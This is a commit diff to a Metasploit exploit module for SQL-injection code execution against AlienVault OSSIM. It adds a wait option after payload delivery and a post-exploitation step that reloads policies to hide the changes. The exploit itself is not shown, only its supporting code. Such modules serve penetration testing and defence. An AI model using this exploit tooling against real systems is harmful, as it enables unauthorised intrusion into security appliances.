Changes to alienvault module

2014-05-01 10:10:15 +07:00 · 2014-05-01 10:10:15 +07:00 · 9bcf5eadb7
parent 9a1b216fdb
commit 9bcf5eadb7
1 changed files with 22 additions and 1 deletions
--- a/modules/exploits/linux/http/alienvault_sqli_exec.rb
+++ b/modules/exploits/linux/http/alienvault_sqli_exec.rb
@ -54,7 +54,8 @@ class Metasploit3 < Msf::Exploit::Remote
      register_options(
        [
          Opt::RPORT(443),
-          OptString.new('TARGETURI', [true, 'The URI of the vulnerable Alienvault OSSIM instance', '/'])
+          OptString.new('TARGETURI', [true, 'The URI of the vulnerable Alienvault OSSIM instance', '/']),
+          OptInt.new('WAIT', [ true, "Number of seconds to wait for exploit to run", 0 ])
        ], self.class)
  end

@ -270,6 +271,7 @@ class Metasploit3 < Msf::Exploit::Remote

    if res && res.code == 404
      print_status("#{peer} - Payload delivered")
+      Rex.sleep(datastore['WAIT'])
    else
      fail_with(Failure::Unknown, "#{peer} - Payload failed!")
    end
@ -328,6 +330,25 @@ class Metasploit3 < Msf::Exploit::Remote
      else
        print_warning("#{peer} - Unable to remove Action ID")
      end
+
+    # Reload the policies to revert back to the state before exploitation
+    print_status("#{peer} - Reloading Policies")
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path, "ossim", "conf", "reload.php"),
+      'cookie' => @cookie,
+      'vars_get' => {
+        'what' => 'policies',
+        'back' => '../policy/policy.php'
+      }
+    })
+
+    if res && res.code == 200
+      print_status("#{peer} - Policies reloaded!")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!")
+    end
+
    ensure
      super # mixins should be able to cleanup even in case of Exception
    end